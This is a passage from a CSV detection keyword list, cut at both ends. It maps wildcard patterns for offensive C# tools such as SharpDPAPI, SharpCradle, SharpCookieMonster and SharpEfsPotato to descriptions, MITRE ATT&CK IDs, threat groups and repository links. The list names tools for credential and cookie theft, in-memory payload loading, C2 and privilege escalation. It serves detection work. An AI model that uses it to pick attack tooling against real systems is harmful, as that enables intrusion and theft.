Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.csproj*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.exe*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCloud.sln*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCloud-master*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*SharpCOM.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCOMManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sharpcompile*.exe*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*sharpCompileHandler*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpCompileServer*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpCompileServer.exe*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*SharpConfigParser.dll*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*sharpcookiemonster*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpCookieMonster*WebSocket4Net.dll*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.csproj*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpCookieMonster.exe*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonster.sln*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCookieMonsterOriginal.exe*,offensive_tool_keyword,SharpCookieMonster,This C# project will dump cookies for all sites. even those with httpOnly/secure/session,T1539 - T1606,TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/m0rv4i/SharpCookieMonster,1,1,N/A,N/A,2,184,41,2023-03-15T09:51:09Z,2020-01-22T18:39:49Z -*SharpCradle*logonpasswords*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpCradle.exe*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpCrashEventLog.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDcomTrigger.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpDir.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDllProxy*,offensive_tool_keyword,SharpDllProxy,Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading,T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/Flangvik/SharpDllProxy,1,1,N/A,N/A,6,565,76,2020-07-21T17:14:01Z,2020-07-12T10:46:48Z -*SharpDomainSpray*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpDomainSpray.*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpDomainSpray-master*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpDoor.exe*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*SharpDoor-master*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*SharpDPAPI backupkey*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpDPAPI* credentias *,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI* vaults *,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.csproj*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.Domain*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDPAPI.exe*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.ps1*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.sln*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPI.txt*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDPAPIMachine*.cs,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpDPAPI-master*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*SharpDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpDXWebcam*,offensive_tool_keyword,SharpDXWebcam,Utilizing DirectX and DShowNET assemblies to record video from a host's webcam,T1123 - T1059.001 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/snovvcrash/SharpDXWebcam,1,1,N/A,8,1,68,10,2023-07-19T21:09:00Z,2023-07-12T03:26:24Z -*sharpedrchecker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpEDRChecker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpEfsPotato by @bugch3ck*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.cs*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.exe*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato.sln*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*SharpEfsPotato-master*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 